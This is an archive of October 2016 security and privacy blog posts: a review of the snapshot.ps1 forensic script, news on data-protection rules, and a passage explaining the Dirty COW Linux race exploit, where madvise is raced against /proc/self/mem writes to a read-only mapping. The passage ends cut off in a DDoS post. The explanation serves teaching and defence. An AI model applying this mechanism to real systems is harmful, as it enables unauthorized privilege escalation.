Monthly Archives: October 2016

Toolsmith – GSE Edition: snapshot.ps1

I just spent a fair bit of time preparing to take the GIAC Security Expert exam as part of the requirement to recertify every four years. I first took the exam in 2012, and I will tell you, for me, one third of the curriculum is a "use it or lose it" scenario. The GSE exam covers GSEC, GCIH, and GCIA. As my daily duties have migrated over the years from analyst to leadership, I had to "relearn" my packet analysis fu. Thank goodness for the Packetrix VM and the SANS 503 exercises workbook: offsets, flags, and fragments, oh my! All went well, mission accomplished, I'm renewed through October 2020 and still GSE #52, but spending weeks with my nose in the 18 course books reminded me of some of the great tools described therein. As a result, this is the first of a series on some of those tools, their value, and use case scenarios.
I'll begin with snapshot.ps1. It's actually part of the download package for SEC505: Securing Windows and PowerShell Automation, but is discussed as part of the GCIH curriculum. In essence, snapshot.ps1 is a single script that encapsulates the activities described in the SANS Intrusion Discovery Cheat Sheet for Windows.
The script comes courtesy of Jason Fossen, the SEC505 author, and can be found in the Day 5-IPSec folder of the course download package. The script "dumps a vast amount of configuration data for the sake of auditing and forensics analysis" and allows you to "compare snapshot files created at different times to extract differences."
To use snapshot.ps1, place the script in a directory where it is safe to create a subdirectory; the script creates one named for the computer, then writes a variety of files containing system configuration data. Run snapshot.ps1 with administrative privileges.
The script runs on Windows 7, Server 2008, and newer Windows operating systems (I ran it on Windows 10 Redstone 2) and requires PowerShell 3.0 or later. You also need autorunsc.exe and sha256deep.exe in your PATH if you want to dump which programs are configured to start automatically when your system boots and you log in, as well as to compute SHA256 file hashes.
That said, if you must make the script run faster, and I mean A LOT FASTER, leave file hashing disabled at the end of snapshot.ps1 for a 90% reduction in run time.
However, Jason points out that file hashing is one of the most useful aspects of the script for identifying adversarial activity. He also points out that snapshot.ps1 is a starter script; you can and should add more commands. As an example, referring back to toolsmith #112: Red vs Blue - PowerSploit vs PowerForensics, after importing PowerForensics you could add something like Get-ForensicTimeline | Sort-Object -Property Date | Where-Object { $_.Date -ge "12/30/2015" -and $_.Date -le "01/04/2016" } | WriteOut -FileName Timeline, which would give you a file system timeline between 12/30/2015 and 01/04/2016. But wait, there's more! Want to grab autoruns without needing autorunsc.exe? Download @p0w3rsh3ll's AutoRuns module, run Import-Module AutoRuns.psm1, then Get-Command -Module AutoRuns to be sure the module is on board. Finally, comment out autorunsc.exe -accepteula -a -c | Out-File -FilePath AutoRuns.csv and add Get-PSAutorun | WriteOut -FileName AutoRuns.
It's then as simple as running .\Snapshot.ps1 and watching your computer-named directory populate (0V3RW4TCH-2016-10-31-9-7 in my case), per Figure 1.

Figure 1: Snapshot.ps1 run
Most result files are written in machine-readable XML, CSV, and TXT, along with REG files generated by the registry exports via reg.exe.
A great example of a results file is the one spawned via dir -Path c:\ -Hidden -Recurse -ErrorAction SilentlyContinue | Select-Object FullName,Length,Mode,CreationTime,LastAccessTime,LastWriteTime | Export-Csv -Path FileSystem-Hidden-Files.csv. The resulting CSV is like a journey down evil memory lane, where all the nuggets I've tested in the past leave artifacts. This would be EXACTLY what you would be looking for under real response scenarios, as seen in Figure 2.

Figure 2: Snapshot.ps1 grabs hidden files
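The real payoff comes from comparing snapshot directories created at different times, as Jason's description suggests. As a quick illustration (this script is not part of the SEC505 package; the flat layout of result files it assumes is based on the run above), a few lines of Python can report which result files were added, removed, or changed between two runs:

```python
from pathlib import Path


def diff_snapshots(old_dir, new_dir):
    """Compare two snapshot.ps1 output directories file by file.

    Returns a dict with files only in the new run ("added"), files only
    in the old run ("removed"), and files present in both runs whose
    contents differ ("changed").
    """
    old_dir, new_dir = Path(old_dir), Path(new_dir)
    old_files = {p.name for p in old_dir.iterdir() if p.is_file()}
    new_files = {p.name for p in new_dir.iterdir() if p.is_file()}
    changed = [
        name for name in sorted(old_files & new_files)
        if (old_dir / name).read_bytes() != (new_dir / name).read_bytes()
    ]
    return {
        "added": sorted(new_files - old_files),
        "removed": sorted(old_files - new_files),
        "changed": changed,
    }
```

Pointing it at two computer-named output directories, e.g. diff_snapshots('0V3RW4TCH-2016-10-31-9-7', '0V3RW4TCH-2016-11-30-9-7') (the second name is hypothetical), surfaces exactly the deltas you would then inspect by hand.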
Sure, there are bunches of related DFIR collection scripts, but I really like this one, and plan to tweak it further. Good work from Jason, and just one of many reasons to consider taking SEC505, or pursuing your GSE!
Cheers...until next time.

Entry into Force of the French Digital Republic Bill

On October 7, 2016, the French Digital Republic Bill (the “Bill”) was enacted after a final vote from the Senate. The Bill aligns the French legal data protection framework with the EU General Data Protection Regulation (“GDPR”) requirements before the GDPR becomes applicable in May 2018.

Increased Fines

The Bill significantly increases the maximum level of fines for violations of the French Data Protection Act. The French Data Protection Authority (“CNIL”) will be able to immediately impose a fine of up to €3 million (previously, fines could not exceed €150,000) until the GDPR becomes applicable. Once the GDPR becomes applicable, the Bill states that the CNIL will be entitled to exercise the full scope of sanctions prescribed by the GDPR (i.e., fines of up to, as the case may be, (1) €10 million or 2 percent of annual worldwide turnover, or (2) €20 million or 4 percent of annual worldwide turnover).

Right to Data Portability

The Bill also gives any consumer the right to obtain, free of charge, a copy of any of his/her data resulting from the use of a service provided by an online communication service provider, except for data that has been “significantly enriched” by the service provider. A further decree will detail the enrichments that are presumed to be insignificant. Online communication service providers will also be required to make changes to their user interfaces and software to facilitate the transmission of personal data to another service provider, as required by the right to data portability. This provision will enter into force on the same day the GDPR becomes applicable (i.e., May 25, 2018).

Enhanced Individual Information and Control Over Personal Data

Any data subject will be able to specify their wishes regarding the retention, erasure and transfer of their personal data after death. These wishes can be recorded with a trusted digital third party certified by the CNIL. Data subjects can also request the erasure of any of their personal data that was collected while they were a minor.

In anticipation of the GDPR, the Bill also requires data controllers to inform individuals of their data retention period, or if that’s not possible, of the criteria used to determine the retention period.

For the first time in France, the draft of the Bill went through an open public consultation process to involve the public in the law making process and understand the questions and issues raised by the proposals.

Dirty COW Notes

I don't usually write about vulnerabilities, because there are so many vulnerabilities out there that writing about just one of them would not contribute much to the security community. So why am I writing about Dirty COW? Because, in my personal opinion, it is huge. When I say "huge" I don't mean it will be used to exploit the "entire world"; I mean it highlights two main issues:
  • Even patched code can hide the same vulnerability, just in a different form. How much patched code is not really "patched"?
  • A pragmatic new approach to finding vulnerabilities: look at patched code and check the patch implementation.
But let's start from the beginning by taking a closer look at the exploit code.

Exploit code (taken from here)

Like many other kernel vulnerabilities, it relies on concurrency: the exploit code fires two separate threads that access the same resource at the same time. Taking a closer look at the main function, you will see that the mmap syscall is used.

calling mmap function
From documentation:
creates a new mapping in the virtual address space of the calling process. The starting address for the new mapping is specified in addr. The length argument specifies the length of the mapping.

mmap does not create a copy of the memory; rather, it creates a new mapping of that (file descriptor's) memory area. This means the process reads data directly from the original file rather than from a copy of it. While most of the parameters are obvious, the MAP_PRIVATE flag is the "core" of the vulnerability. It enables "copy on write" (hence the name COW), which copies the original data to a new memory area the moment the process writes to it. Since mmap has mapped a read-only area and the process wants to write to it, mmap (MAP_PRIVATE) creates a copy of that data on write, and the modified data is not propagated to the original memory area.
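The copy-on-write behaviour of MAP_PRIVATE is easy to demonstrate from userland. A minimal Python sketch (Unix-only; Python's mmap module wraps the same syscall and flags): a write through a private mapping lands in the process's private copy, while the underlying file is untouched:

```python
import mmap
import os
import tempfile


def private_mapping_demo():
    """Map a file MAP_PRIVATE, write through the mapping, and show that
    the change stays in the process's copy-on-write copy: the file on
    disk keeps its original contents."""
    fd, path = tempfile.mkstemp()
    try:
        os.write(fd, b"original")
        # Private (copy-on-write) mapping: writes go to a private copy.
        m = mmap.mmap(fd, 8, flags=mmap.MAP_PRIVATE,
                      prot=mmap.PROT_READ | mmap.PROT_WRITE)
        m[:8] = b"modified"
        in_mapping = bytes(m[:8])
        m.close()
        os.lseek(fd, 0, os.SEEK_SET)
        on_disk = os.read(fd, 8)
        return in_mapping, on_disk
    finally:
        os.close(fd)
        os.unlink(path)
```

The mapping reads back as modified while the file still reads as original, which is exactly the isolation the exploit has to defeat.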

Now the exploit runs two threads which exploit a race condition to get write access to the original memory area. The first thread repeatedly calls madvise (memory advise), which is used to improve performance by tagging a memory area according to its usage: for example, memory can be tagged as NORMAL, SEQUENTIAL, FREE or WILLNEED, and so on. In the exploit, the mmap'd memory is continuously tagged as DONTNEED, which basically means the memory is not going to be used in the near future, so the kernel may free its space and reload the content only when needed.

First Thread implementing madvise
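The effect of MADV_DONTNEED on a private mapping is also easy to see from userland. In this Python sketch (Linux semantics assumed; this shows the behaviour the exploit races against, not the exploit itself), the advice throws away the process's dirty copy-on-write page, and the next access is served from the original file again:

```python
import mmap
import os
import tempfile


def madvise_dontneed_demo():
    """Write to a private mapping, then madvise(MADV_DONTNEED) it.
    On Linux the kernel drops the dirty copy-on-write pages, so the
    next access repopulates the mapping from the underlying file."""
    fd, path = tempfile.mkstemp()
    try:
        os.write(fd, b"original")
        m = mmap.mmap(fd, 8, flags=mmap.MAP_PRIVATE,
                      prot=mmap.PROT_READ | mmap.PROT_WRITE)
        m[:8] = b"modified"
        before = bytes(m[:8])
        m.madvise(mmap.MADV_DONTNEED)  # "I won't need these pages"
        after = bytes(m[:8])           # fault: reloaded from the file
        m.close()
        return before, after
    finally:
        os.close(fd)
        os.unlink(path)
```

Before the advice the mapping shows the private modification; after it, the original file content is back, because the private copy was discarded. The exploit wins when this discard lands in the middle of the kernel's write path.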

Meanwhile, another thread writes to its own memory space (by abusing the pseudo-file notation /proc/self/mem), directly at the mmap'd area pointing to the opened file. Since we invoked the mmap function with the MAP_PRIVATE flag, we are not going to write to the original memory but to a copy of it (copy on write).

Second Thread implementing write on pseudo self/mem

The race condition between these two threads tricks the copy-on-write against the original memory area: the copied area can be tagged as DONTNEED while the write procedure is not yet finished. And voilà, you are writing to a read-only file!
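For completeness, the /proc/self/mem plumbing itself can be exercised harmlessly. This Python sketch (Linux-only, and an illustration rather than the exploit: the mapping here is writable, so there is no race and no privilege boundary crossed) writes through the pseudo-file at the address of a private mapping; the mapping changes but the file on disk does not:

```python
import ctypes
import mmap
import os
import tempfile


def proc_self_mem_demo():
    """Write into our own address space through /proc/self/mem, at the
    address of a MAP_PRIVATE file mapping. The mapping shows the new
    data, but copy-on-write keeps the underlying file intact."""
    fd, path = tempfile.mkstemp()
    try:
        os.write(fd, b"original")
        m = mmap.mmap(fd, 8, flags=mmap.MAP_PRIVATE,
                      prot=mmap.PROT_READ | mmap.PROT_WRITE)
        buf = (ctypes.c_char * 8).from_buffer(m)  # learn the mapping's address
        addr = ctypes.addressof(buf)
        mem_fd = os.open("/proc/self/mem", os.O_WRONLY)
        try:
            os.pwrite(mem_fd, b"modified", addr)  # write via the pseudo-file
        finally:
            os.close(mem_fd)
        in_mapping = bytes(m[:8])
        del buf                                   # release the exported buffer
        m.close()
        os.lseek(fd, 0, os.SEEK_SET)
        on_disk = os.read(fd, 8)
        return in_mapping, on_disk
    finally:
        os.close(fd)
        os.unlink(path)
```

This is the legitimate path through the kernel's get_user_pages machinery; Dirty COW's trick is racing madvise against it on a mapping that should never have been writable at all.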

OK, now we have figured out how the trick works, but what is more interesting is the story behind it.

Going to the issue tracker, Linus Torvalds (maximum respect) wrote:

This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit 4ceb5db9757a ("Fix get_user_pages() race for write access") but that was then undone due to problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug"). In the meantime, the s390 situation has long been fixed, and we can now fix it by checking the pte_dirty() bit properly (and do it better). The s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement software dirty bits") which made it into v3.9. Earlier kernels will have to look at the page state itself. Also, the VM has become more scalable, and what used to be a purely theoretical race back then has become easier to trigger.
S390 is ancient IBM technology... I am not even sure it still exists in the real world (at least compared to recent systems). The Linux community probably forgot about that reversion; otherwise they would have reinstated the fix in more recent memory managers.

Anyhow, the bug has now "been fixed" by introducing a new internal flag called FOLL_COW (really!?) which basically says "yes, I already did the copy on write".
Basically, the process can write even to unwritable PTEs, but only after it has gone through a COW cycle and they are dirty. The diff patch follows:

Dirty COW patch, October 2016

The Dirty COW vulnerability sparked in my mind a new vulnerability-hunting process. On one hand, laboratories with extremely sophisticated, tuned and personalised fuzzers represent the "industrial" way (corporate and/or governmental) to find new vulnerabilities; on the other hand, there is the more romantic and crafty way of professionals and security researchers who rely on handwork and smart choices. But another smart approach (industrial or romantic) could be to investigate the patched code itself.

Patched code is, by definition, where a bug or issue was located. The most difficult part of finding vulnerabilities (not exploiting them) is figuring out where they are among thousands of lines of code. So hunting for vulnerabilities in patched code can be much quicker, even if the presence of a patch adds "hypothetical" complexity. But as this case testifies... that is not always true!

NHTSA Releases New Automobile Cybersecurity Best Practices

The National Highway Safety Administration (“NHTSA”) recently issued non-binding guidance that outlines best practices for automobile manufacturers to address automobile cybersecurity. The guidance, entitled Cybersecurity Best Practices for Modern Vehicles (the “Cybersecurity Guidance”), was recently previewed in correspondence with the House of Representatives’ Committee on Energy and Commerce (“Energy and Commerce Committee”).

According to the NHTSA, the Cybersecurity Guidance is “non-binding guidance” that contains “voluntary best practices” to improve motor vehicle cybersecurity. The Cybersecurity Guidance generally encourages automobile manufacturers to utilize a “layered approach” through adopting the National Institute of Standards and Technology (“NIST”) Cybersecurity Framework and its five principles: identify, protect, detect, respond and recover. NHTSA also recommends the use of certain industry standards such as ISO 27000 series standards, and other best practices, such as the Center for Internet Security’s Critical Security Controls for Effective Cyber Defense. While the Cybersecurity Guidance admits that these standards were developed to mitigate threats against networks and not necessarily automotive devices, it nevertheless contends that they can still be adopted for use in the automotive industry. As with NHTSA’s cyber guidance for autonomous vehicles, the Cybersecurity Guidance also encourages automobile manufacturers to engage in information sharing as well as have a process for vulnerability reporting.

The month before the Cybersecurity Guidance was released, the Energy and Commerce Committee sent NHTSA a letter raising questions concerning cybersecurity risks related to On Board Diagnostics (“OBD-II”) ports, calling on NHTSA to establish an industry-wide working group on the subject. The Cybersecurity Guidance does not directly address OBD-II ports, though it does call for operational limits on “control vehicle maintenance diagnostic access” and calls on the automotive industry to consider the effects of aftermarket devices like insurance dongles and cell phones that are connected to vehicle information systems. Furthermore, in its response to the Energy and Commerce Committee, NHTSA indicated that at their request, “SAE International has started a working group that is looking to explore ways to harden the OBD-II port.”

On October 28, 2016, NHTSA published a request for public comments on the Cybersecurity Guidance and has opened a docket for those comments. Comments are due on November 28, 2016.

Regulation on the Online Protection of Minors Published for Comment in China

Recently, the Cyberspace Administration of China published for public comment a draft of the Regulations on the Online Protection of Minors (“Draft Regulations”). The Draft Regulations are open for comment until October 31, 2016.

The Draft Regulations stipulate certain requirements applicable to the online collection and use of personal information of minors. Under the Draft Regulations, any entity that collects or uses personal information of minors via the Internet must place a warning label in an easily visible position, stating the source, content and purpose of the collection of the information. That entity must then obtain the consent of the minors, or of their guardians. These entities are required to adopt specific collection and use rules to strengthen the online protection of minors’ personal information.

If a minor, or his or her guardian, requests an Internet information service provider to delete or block the minor’s personal information, the Internet information service provider must abide by the request.

The Draft Regulations also stipulate that Internet information service providers who provide online gaming services must require online gamers to provide authentic identity information when registering. The cybersecurity authority will establish a blacklist of entities that have failed to protect the personal information of minors online.

Under the Draft Regulations, “personal information of minors” refers to all information that is recorded, whether electronically or otherwise, and can be used to identify a minor, whether individually or in combination with other information. The term includes name, location, address, date of birth, contact information, account name, identity card number, personal biological identification information and portrait, etc., of a minor.

An entity that violates the requirements in the Draft Regulations that apply to the collection and use of personal information of minors may face administrative penalties, including a warning and a requirement to effect a correction, a fine of up to RMB 500,000 and an order to suspend or stop the provision of relevant services.

FCC Adopts Broadband Consumer Privacy Rules

This post has been updated. 

On October 27, 2016, the Federal Communications Commission (“FCC”) announced the adoption of rules that require broadband Internet Service Providers (“ISPs”) to take steps to protect consumer privacy (the “Rules”). According to the FCC’s press release, the Rules are intended to “ensure broadband customers have meaningful choice, greater transparency and strong security protections for their personal information collected by ISPs.” 

The Rules require ISPs to obtain customer consent for the use and disclosure of customer information as follows:

  • Opt-in: ISPs are required to obtain affirmative “opt-in” consent from consumers to use and share sensitive information, including precise geolocation data, financial information, health information, children’s information, Social Security numbers, web browsing history, app usage history and the content of communications.
  • Opt-out: ISPs may use and share non-sensitive customer information unless a customer “opts-out.” All other individually identifiable customer information (e.g., email address or service tier information) is considered non-sensitive and the use and sharing of such information is subject to opt-out consent.
  • Exceptions to consent requirements: Customer consent is inferred for certain purposes, including the provision of broadband service or billing and collection. For the use of this type of information, the Rules do not require additional customer consent beyond the establishment of the customer-ISP relationship.

The Rules also:

  • Require ISPs to provide customers with clear, conspicuous and persistent notice about the information they collect, how it may be used and with whom it may be shared, as well as how customers can change their privacy preferences.
  • Require broadband providers to engage in reasonable data security practices. To that end, the Rules provide guidelines on steps ISPs should consider taking to protect customer data, including (1) implementing relevant industry best practices, (2) providing appropriate oversight of security practices, (3) implementing robust customer authentication tools, and (4) properly disposing of data.
  • Impose data breach notification requirements as follows: In the event that an ISP determines that unauthorized disclosure of a customer’s personal information has occurred, unless the ISP determines that no harm is reasonably likely to occur, the ISP must notify (1) affected customers no later than 30 days after the determination has been made; (2) if the breach affected 5,000 or more customers: the FCC, FBI and U.S. Secret Service, no later than seven business days after the determination has been made; and (3) the FCC at the same time customers are notified if the breach affected fewer than 5,000 customers.
  • Prohibit “take-it-or-leave-it” offers, meaning that an ISP cannot refuse to serve customers who do not consent to the use and sharing of their information for commercial purposes.

According to the FCC’s press release, the Rules do not apply to the privacy practices of websites and other “edge services” over which the FTC has authority. In addition, the scope of the Rules does not include other services of broadband providers, such as the operation of social media websites, or issues such as government surveillance, encryption or law enforcement.

Next Steps

According to the FCC’s press release:

  • the requirements related to Notice and Choice will become effective approximately 12 months after publication of the summary of the Order in the Federal Register. Small providers will have an additional 12 months to comply;
  • the data security requirements will go into effect 90 days after publication of the summary of the Order in the Federal Register; and
  • the data breach notification requirements will become effective approximately six months after publication of the summary of the Order in the Federal Register.

UPDATE: On November 2, 2016, the FCC released the full text of the rules.

Privacy Blog Nominated for Best AmLaw Blog of 2016 – Please Vote To Help Us Win!

Hunton & Williams LLP is proud to announce our Privacy & Information Security Law Blog has been nominated in The Expert Institute’s 2016 Best Legal Blog Contest for Best AmLaw Blog of 2016. From all of the editors, lawyers and contributors that make our blog a success, we appreciate your continued support and readership, and ask that you please take a moment to vote for our blog!

The Privacy & Information Security Law Blog was ranked as the #1 Privacy & Data Security blog in LexBlog’s 2015 AmLaw 200 Blog Benchmark Report, and named PR News’ Best Legal PR Blog in 2011. It was noted that the “privacy blog influences global privacy and data security developments.”

Click to vote.

Irish Privacy Advocacy Group Challenges EU-U.S. Privacy Shield

A recent update on the Court of Justice of the European Union’s (the “CJEU’s”) website has revealed that Digital Rights Ireland, an Irish privacy advocacy group, has filed an action for annulment against the European Commission’s adequacy decision on the EU-U.S. Privacy Shield (the “Privacy Shield”).

Digital Rights Ireland has yet to comment on its action, but media sources quote a spokesperson for the European Commission acknowledging the case and stressing the European Commission’s conviction that the Privacy Shield meets all legal requirements. At present, no documents have been published in relation to the case; the only information currently available on the CJEU’s website is that the action was filed on September 16, 2016.

The Privacy Shield was adopted on July 12, 2016, as the successor to the U.S.-EU Safe Harbor Framework that was invalidated by the CJEU in October 2015. The Privacy Shield is designed to protect the fundamental rights of individuals whose personal data is transferred to the U.S. and ensure legal certainty for businesses with respect to transatlantic transfers of personal data.

APEC Cross-Border Privacy Rules System Poised for Expansion

On October 21, 2016, the Vietnam e-Commerce and Information Technology Agency and APEC co-hosted an APEC Cross-Border Privacy Rules (“CBPR”) system capacity-building workshop in Da Nang, Vietnam, on the heels of last week’s bilateral affirmation of commitment between the U.S. and Japan to implement and expand the CBPR system. The workshop further signals the continuing growth of the CBPR system.

The workshop, Readiness for the Cross-Border Privacy Rules System in APEC, was organized under the auspices of APEC’s “CBPR Multi-Year Project” which is dedicated to providing funding to APEC countries that wish to join the CBPR system. The workshop brought together Asia-Pacific-based government officials, privacy and data governance experts, third-party certifiers and online dispute resolution providers, as well as Vietnamese private sector stakeholders, to discuss the state of CBPR implementation in Vietnam and other APEC economies.

Featured prominently in the workshop was a draft report conducted by the Vietnam e-Commerce and Information Technology Agency entitled, “Survey on the Readiness for Joining CBPRs.” The report surveyed APEC member countries about their intent to join Canada, the U.S., Mexico and Japan in the CBPR system. The responses were highly promising; Korea, Singapore and the Philippines reported that they “plan to join,” and Australia, Hong Kong, Russia, Taiwan and Vietnam are “considering” joining. The comments on the ground were even more promising. For example, the representative from the Philippines predicted that his country will join the CBPR system within one to two years. Of course, several workshop participants cautioned that there are various unresolved issues that need to be addressed before their countries could join. The issues include, for example, which government agency would lead the application process or be responsible for enforcement of the CBPR, and how to structure the certification process to ensure its scalability to companies of all sizes. To address these issues and others, the workshop brought in a number of international experts, some of whom have been significantly involved in either the creation or implementation of the CBPR system, or have other relevant experience in the governance of cross-border data flows, organizational accountability and data protection management.

Developed by the 21 APEC member economies, the APEC CBPR system is a regional, multilateral, cross-border data transfer mechanism and enforceable privacy code of conduct developed for businesses. The CBPRs implement the nine high-level APEC Privacy Principles set forth in the APEC Privacy Framework. Currently, the U.S., Mexico, Canada and Japan are participants in the APEC CBPR framework.

FTC Issues Guide for Businesses on Handling Data Breaches

On October 25, 2016, the Federal Trade Commission released a guide for businesses on how to handle and respond to data breaches (the “Guide”). The 16-page Guide details steps businesses should take once they become aware of a potential breach. The Guide also underscores the need for cyber-specific insurance to help offset potentially significant response costs.

The Guide lists several actions for a business to take if it suspects or confirms it has experienced a data breach. These include securing operations, fixing vulnerabilities and notifying appropriate parties. According to the Guide, businesses should consider “assembl[ing] a team of experts to conduct a comprehensive breach response,” including independent forensic investigators and outside legal counsel.

The Guide also emphasizes the importance of breach notification and stresses that notification should be made to individuals, other affected businesses, regulators and law enforcement, taking into account all applicable state data breach notification laws and federal regulations (e.g., the HIPAA Breach Notification Rule or the Gramm-Leach-Bliley Act). The Guide also highlights the need for expedient notification to allow affected parties to take steps to protect their information as soon as possible, and provides a model breach notification letter.

Finally, the Guide serves as yet another reminder to businesses to ensure that their cybersecurity programs include both adequate cybersecurity safeguards and appropriate insurance coverages, including first-party and third-party cyber/crime insurance coverages. Failure to maintain either component may hinder an appropriate cyber response as well as limit or preclude coverage for any resulting cyber losses and expenses.

Wrong About Presentations

But first- this series is a bit off-the-cuff and lacking in polish, but I’ve been meaning to do it for ages and if I wait, well, this blog continues to look abandoned.  So please forgive the rambling and read on.

Today let’s start talking about presentations.

I have heard and read that they are all too long, except the ones that are too short.  That talks are simultaneously too technical and too high-level.  Oh, and all panels suck.  TED-style talks are the best, except that they are hollow, empty, and don’t work for highly technical content.  And you should never let vendors speak because we’re all just sales weasels, except for the events where only “sponsors” get to speak.

Let me once again venture into crazy talk: it really depends on who you are and what you want.  I don’t like vendor sales pitches, but apparently some folks find them a good use of their time.  I’d rather avoid those kind of talks, but that’s me (and probably you, too, but whatever).  If sales presentations are a good use of your time, that’s OK with me.  I do hope you do some homework before whipping out the old purchase orders, though.

I will say that a lot of presentations I’ve seen could have been delivered better in a shorter timeframe, but that’s as much on the events as the speakers.  If the only choice is an hour slot, people do an hour talk.  I do think the quality of things like Shmoocon Firetalks is due in part to people paring down what they planned as a longer talk, leaving only the key points, and delivering them in a short time.  Scheduling talks of different lengths does pose real logistical challenges for conference organizers, but I think it would be good to make it easy for people to do shorter talks.  Of course, speaker ego can be an issue; we need to make it clear that the quality of a talk is not tied to its length.  I also think that shorter talks make it easier to get new things in front of an audience.

Presentation style: there’s a topic sure to inflame absolutists.  The style has to match the speaker and the topic.  You will never do a good TED-style talk that walks through the code of your new project or steps through disassembly of malware.  Conversely, a code walk isn’t the way to explain big-picture issues.  Lately my presentations weave ideas and information together via storytelling, in a style that sometimes borders on stand-up comedy.  It works for me and the less technical topics I’ve covered in the past few years, but it certainly won’t work for everyone or every topic.  I know there are disciples of books and styles such as Presentation Zen and Slide:ology; I think they are great resources, but as always there is no One True Way.  Do what works for your audience and for you.

As far as panels, many are indeed a lazy attempt at getting on the schedule; they’re frequently poorly moderated and wander off topic into incoherent ramblings.  It is also true that well-run panels can showcase a diverse set of opinions and experiences and add nuance to complicated topics.  Panels do not suck; bad panels suck.

And no, this series isn’t over, I’m just getting warmed up.



ART – Panda’s Intelligent Control Platform


In the complex world of IT security, real-time information is fundamental to protect corporate data and resources. Most enterprises are aware that if they do not have complete visibility of their network, it is easy to fall victim to cyber-attacks.

Although a large focus has been placed on external threats such as Ransomware, businesses are also at risk from internal threats.

Employees have access to immense amounts of company data daily, and organisations are often not able to track what employees are accessing and what they are doing with company data. Without proper security in place, employees can be an organisation’s biggest threat, as was the case with the now-infamous Edward Snowden and Bradley Manning. Snowden stole and published classified NSA documents, while Manning, formerly a US Army soldier, disclosed confidential military and diplomatic documents to WikiLeaks.
Organisations need to be aware of, and manage such internal threats, in addition to the ever present external threats as such Ransomware and APT’s.

Managing the actions of all employees is a mammoth task, whether the organisation has 10 or 10,000 employees. Businesses need to leverage new technology to reduce this burden, technology such as Panda Security’s new Advanced Reporting Tool. This efficient and easy-to-use tool analyses data to provide insight into corporate resource usage, enabling informed strategic decisions.


ART automatically generates security intelligence, allowing businesses to take control of all their endpoints and combat poor internal practices.

The Advanced Reporting Tool (ART) is an add-on for Panda’s Endpoint Detection and Response solution, Adaptive Defense. Information about all running processes, gathered by Adaptive Defense, is extracted, stored and correlated by ART. The platform automatically generates security intelligence and allows users to identify risky behaviour and problems, ultimately exposing any misuse of the corporate network or resources.

In short, ART allows IT administrators to:

  • Search relevant information, increasing efficiency by enabling IT staff to find problem areas.
  • Pinpoint problems by extracting behaviour patterns from resources and users, and identify their impact on the business.
  • Receive real-time alerts about any possible data breaches.
  • Generate configurable reports showing the status of key security indicators and how they are evolving.

Advanced Reporting Tool – a real-time diagnosis tool that enables full visibility of the network.

In addition to the existing Big Data Cloud Service and its real-time alerts, ART includes predefined and adaptable analysis with four different action areas:

  • Information about IT security incidents. ART generates security intelligence, processing and correlating events to identify intrusion attempts.
  • Controls network applications and resources.
  • Controls access to business data.
  • Displays access to files containing confidential information and their online traffic.


The SIEMFeeder platform enables businesses to take advantage of Big Data and maximise resources.

Many organisations are taking further steps to ensure they are protected from threats by implementing a SIEM solution. As an alternative or complement to the Advanced Reporting Tool, Panda Security has developed SIEMFeeder, an add-on that enables communication between Adaptive Defense and a user’s existing SIEM tool.

SIEMFeeder provides relevant data, amplifies information and associates it with the information you already have, enabling detection of risk areas before they become the biggest threat to your business.


Court Rules Fraud Involving a Computer Is Not ‘Computer Fraud’ under Crime Protection Policy

On October 18, 2016, the United States Court of Appeals for the Fifth Circuit held in Apache Corp. v. Great American Ins. Co., No 15-20499 (5th Cir. Oct. 18, 2016), that a crime protection insurance policy does not cover loss resulting from a fraudulent email directing funds to be sent electronically to the imposter’s bank account because the scheme did not constitute “computer fraud” under the policy.


An employee at Apache Corporation, an oil production company based in Houston, Texas, with worldwide operations, received a telephone call from an individual identifying himself as a representative of Petrofac, a vendor of Apache. The caller instructed the Apache employee to change the bank account to which payments to Petrofac were made. The employee requested that confirmation of the change request be provided on Petrofac’s letterhead.

Shortly thereafter, the fraudsters provided the Apache accounts-payable department with an email of the request on Petrofac letterhead. The letter also included a phony telephone number, which Apache personnel used to confirm the requested change. Apache then proceeded to make payment to the fraudulent account when it came time to pay Petrofac’s invoices. Within one month, Apache was notified that Petrofac had not received approximately $7 million in payments that had been sent to the fraudulent account. Apache recouped a portion of the payments from its bank and attempted to recover the balance from its insurer.

Apache was insured under a crime-protection insurance policy issued by Great American Insurance Company (“GAIC”). Apache submitted a claim to GAIC for reimbursement of the unrecovered funds under the policy’s computer-fraud coverage, which afforded coverage for loss “resulting directly from the use of any computer to fraudulently cause a transfer” of money or property to a person or place outside the company. GAIC denied coverage, claiming that the loss did not directly result from the use of a computer nor did the use of a computer cause the transfer of the funds. Apache filed suit in Texas state court and GAIC removed. The federal district court sided with Apache and held that the intervening steps of the phone call and approval of the change request by Apache’s supervisors did not alter the fact that the fraudsters used a computer to perpetrate the fraud. The district court also held that GAIC’s construction of the policy would effectively limit the policy to affording coverage only for computer hacking, thus rendering the policy “pointless.”

Read the full alert.

Privacy Partner Aaron Simpson Relocates to London to Guide Multinationals Through Unprecedented UK and EU Challenges

Earlier this month, Hunton & Williams announced that Global Privacy and Cybersecurity partner Aaron P. Simpson has relocated to London from the firm’s New York office. He will continue his work on behalf of clients as a leader of the firm’s Global Privacy and Cybersecurity practice.

“There is growing European interest in the U.S. Privacy Shield and in cybersecurity issues, areas in which Aaron has particular experience,” said Bridget Treacy, managing partner of the firm’s London office. “I am delighted to have Aaron on board; having him in London adds additional strength and capacity to our team here, enabling us to better serve our local clients.”

Simpson helped develop the firm’s renowned global privacy practice that began nearly 15 years ago. He is widely recognized for his work with clients on a broad range of complex global data protection and cybersecurity matters. These range from internal investigations into large-scale cybersecurity incidents to the development of cross-border data transfer solutions, compliance with existing and emerging data protection requirements in Europe and around the globe, and negotiating data-driven commercial agreements. Among his many awards and recognitions, Simpson has been recognized for his work on behalf of clients by The Legal 500 as a Leading Lawyer in Cyber Law.

“Our client roster is internationally renowned, and the monumental legal and political changes in the UK and Europe have created unprecedented challenges for multinationals seeking to successfully navigate the changing landscape,” said Simpson. “I look forward to helping our clients overcome these challenges.”

Cutting through the Dyn

Last Friday (October 21), one of the largest DDoS attacks ever seen caused widespread internet outages, affecting services from Twitter, AWS, Reddit, Netflix, Spotify, CNN, PayPal, the NY Times, the WSJ, and others. The attack was directed at Dyn, a domain name service provider whose servers interpret internet addresses, directing web traffic to the affected companies. Dyn …
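The role Dyn's name servers play can be illustrated with a toy sketch (purely illustrative, not Dyn's actual infrastructure; the hostnames and addresses are invented): when DNS resolution fails, a site becomes unreachable to clients even though its own servers remain healthy.

```python
# Illustrative sketch of DNS resolution: hostnames and IP addresses
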